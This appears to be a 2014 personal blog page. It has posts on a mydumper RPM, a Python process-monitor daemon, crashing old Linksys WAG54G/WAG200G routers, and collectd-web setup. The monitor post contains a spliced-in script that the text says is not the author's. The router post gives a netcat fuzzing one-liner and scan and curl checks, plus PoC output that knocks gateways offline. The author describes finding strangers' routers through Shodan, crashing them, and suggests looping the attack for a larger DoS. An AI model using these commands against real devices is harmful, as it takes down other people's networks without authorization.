Monday, September 29, 2014

MyDumper 0.6.2 RPM for CentOS 6.5

Hello... my new mydumper RPM package for CentOS 6.5 is here.

From the original Changelog:
Bugs Fixed:
  • 1347392 last row of table not dumped if it brings statement over statement_size
  • 1157113 Compilation of latest branch fails on CentOS 6.3 64bit
  • 1326368 Can't make against Percona-Server-devel-55 headers
  • 1282862 unknown type name 'HASH'
  • 1336860 k is used twice
  • 913307 Can't compile - missing libs crypto and ssl
  • 1364393 rows chunks doesn't increase non innodb jobs
New Features:
  • TokuDB support
  • Support to dump tables from different schemas
  • --lock-all-tables (instead of FTWRL)
Available in our repo:
PS: Not tested yet. Sorry. Please report any issues in the comments.
Update: new version of mydumper available.

Wednesday, September 24, 2014

Process monitor template with logger and email notifier (daemonized)

If you are looking for a template to write a quick copy-and-paste script (daemonized) for monitoring one process... you can get some ideas from this:
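As an added example of a template of that shape (this is not the author's script from the post), a daemonized monitor in Python 3: it looks for the process by reading /proc (Linux assumed), logs every check, and sends an e-mail only when the process goes down or comes back, through a local SMTP relay. PROCESS_NAME, INTERVAL, LOG_FILE, the mail addresses and SMTP_HOST are placeholder settings to adjust for your host.

```python
#!/usr/bin/env python3
"""Daemonized single-process monitor with logger and e-mail notifier.

Added example, not the author's template. Assumes Linux (/proc is read to
find the process) and an SMTP relay reachable at SMTP_HOST.
"""
import logging
import os
import smtplib
import socket
import sys
import time
from email.mime.text import MIMEText

# --- placeholder settings; adjust for your host ---------------------------
PROCESS_NAME = "mysqld"            # value of /proc/<pid>/comm to watch
INTERVAL = 30                      # seconds between checks
LOG_FILE = "/var/log/procmon.log"  # daemon log (make it root/adm readable only)
MAIL_FROM = "procmon@localhost"
MAIL_TO = ["root@localhost"]
SMTP_HOST = "localhost"

log = logging.getLogger("procmon")


def is_running(name, proc="/proc"):
    """True if some process has `name` as its command name (/proc/<pid>/comm)."""
    try:
        pids = [p for p in os.listdir(proc) if p.isdigit()]
    except OSError:                 # no /proc: cannot tell, treat as not running
        return False
    for pid in pids:
        try:
            with open(os.path.join(proc, pid, "comm")) as f:
                if f.read().strip() == name:
                    return True
        except OSError:             # process exited between listdir() and open()
            continue
    return False


def build_mail(name, event, host):
    """Build the notification message; `event` is "down" or "up"."""
    body = "%s: process '%s' is %s (checked at %s)" % (
        host, name, event.upper(), time.strftime("%Y-%m-%d %H:%M:%S"))
    msg = MIMEText(body)
    msg["Subject"] = "[procmon] %s %s on %s" % (name, event.upper(), host)
    msg["From"] = MAIL_FROM
    msg["To"] = ", ".join(MAIL_TO)
    return msg


def send_mail(msg):
    """Deliver `msg` through the SMTP relay; a mail failure is logged, not fatal."""
    try:
        with smtplib.SMTP(SMTP_HOST, timeout=10) as smtp:
            smtp.send_message(msg)
    except (smtplib.SMTPException, OSError) as exc:
        log.error("could not send notification: %s", exc)


class Monitor:
    """Remembers the last known state and reports only transitions, so a
    process that stays down produces one mail, not one per interval.
    `checker` and `notifier` are injectable for testing without a real
    process or mail server."""

    def __init__(self, name, checker=is_running, notifier=send_mail):
        self.name = name
        self.checker = checker
        self.notifier = notifier
        self.was_running = None     # unknown until the first check

    def check(self):
        """Run one check; return "down", "up" or None (no state change)."""
        running = self.checker(self.name)
        event = None
        if self.was_running is not False and not running:
            event = "down"          # also fires if the process is down at startup
        elif self.was_running is False and running:
            event = "up"
        self.was_running = running
        if event:
            log.warning("process %s is %s", self.name, event)
            self.notifier(build_mail(self.name, event, socket.gethostname()))
        else:
            log.info("process %s running=%s", self.name, running)
        return event


def daemonize():
    """Classic double fork: detach from the terminal and the session."""
    if os.fork() > 0:
        sys.exit(0)
    os.setsid()
    if os.fork() > 0:
        sys.exit(0)
    os.chdir("/")
    os.umask(0o022)
    devnull = os.open(os.devnull, os.O_RDWR)
    for fd in (0, 1, 2):
        os.dup2(devnull, fd)


def main():
    logging.basicConfig(filename=LOG_FILE, level=logging.INFO,
                        format="%(asctime)s %(levelname)s %(message)s")
    daemonize()
    mon = Monitor(PROCESS_NAME)
    while True:
        mon.check()
        time.sleep(INTERVAL)


if __name__ == "__main__":
    main()
```

Run it as root (or as a user that can write LOG_FILE) and it backgrounds itself; everything worth keeping is in the log, and the mail is only a heads-up on state changes. Matching on /proc/<pid>/comm rather than grepping a `ps` listing avoids the classic false positive where the monitor matches its own command line.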



Saturday, September 6, 2014

Killing old Linksys WAG54* or WAG200* like "Rambo" (temporary)

Two days ago I visited a friend of mine. I was showing him how to discover open ports in a network with nmap. As an example I chose his home gateway. His gateway is/was a WAG54G from Linksys, without updated firmware. Year 2009, more or less.

He was surprised when we discovered two weird ports on the gateway: ports 5190 and 5566. He didn't have any port configured to be open, but I ignored that because I thought they were some private ports to configure the gateway from a GUI in Windows or something similar.

We were speaking and connecting to some ports for a while.... and I figured out that the behavior of port 5566 was different after connecting to port 5190. It was very odd.

If you connect to port 5566 you get disconnected immediately, but if you connect to port 5190 first, port 5566 waits for data in a lot of cases. Bye bye to the fast disconnection.

So, out of curiosity, I tried to fuzz the port with /dev/urandom.... something similar to:
cat /dev/urandom | nc -v 192.168.1.1 5566
Meanwhile... when I was explaining to my friend how a protocol works, our internet connection went down.

BOOM!        o_O

I said: - Ermmm... Let me try it again, buddy!      ..and...

BOOM!       O_O

I had to go back home. On the way, I was thinking about the port issue.

At home, my first step was to see if those ports were private or public.... and BOOM! Public!

But I didn't have any Linksys router at home to try it again... so my friend Shodan came to the rescue! ;)

The next steps were very boring: more or less, it was a huge trial-and-error process, and this was the PoC conclusion:

Ingredients:
  • Very old Linksys: Shodan has a lot of them.
  • Ports 5190 and 5566 open: Shodan has few of them, but it has them.
  • Nmap to confirm some data.
There we go:
$ nmap -sS -p 5190,5566 x.x.x.x

Starting Nmap 5.51 ( http://nmap.org ) at 2014-09-06 08:33 CEST
Nmap scan report for gateway (x.x.x.x)
Host is up (0.080s latency).
PORT     STATE SERVICE
5190/tcp open  aol
5566/tcp open  westec-connect

Curl check:
$ curl -I -q --max-time 5 x.x.x.x
HTTP/1.1 401 Unauthorized
Server:
Date: Sat, 06 Sep 2014 06:31:53 GMT
WWW-Authenticate: Basic realm="Linksys WAG200G "
Content-Type: text/html
Connection: close

OK. Ingredients OK. We can run the PoC. Sometimes you need to run it two or more times. Honestly, I don't know why.

$ python OldLinksysMustDie.py x.x.x.x
OldLinksysMustDie v0.001b PoC
 * Connecting to x.x.x.x...
 * Cooking... be patient....
 * On Fire!
><
><
><
[BYEBYE] Ooops! connection to the target lost. [BYEBYE]

Curl again:

curl -I -q --max-time 5 x.x.x.x
curl: (28) Operation timed out after 5001 milliseconds with 0 bytes received

And RAMBO was here! I tried other ones and... all temporarily dead!!

NOTE: The router recovers 5-10 minutes after running the PoC, but if you want a big DoS, a "loop" in the computer world is so easy..... ;)

Finally, my horrible PoC (horrible like my English) in Python:

Are you ready John?

Firmware affected: 
  • 1.01.04


Thursday, September 4, 2014

collectd-web for CentOS 6.5

There are RPM packages for collectd for CentOS 6.x; you will need the EPEL repository.

If you want an easy web interface to the graphs, there is a collectd-web package there, but that package is actually the collection3 frontend. So, if you prefer the original collectd-web, you will need to install it from its GitHub site. The most important thing is to create the /etc/collectd/collection.conf file. Be careful: if you want to change that path, you will need to modify the sources.

The collection file content for CentOS is something like:
datadir: "/var/lib/collectd/"
And a minimal configuration for the Apache would be like: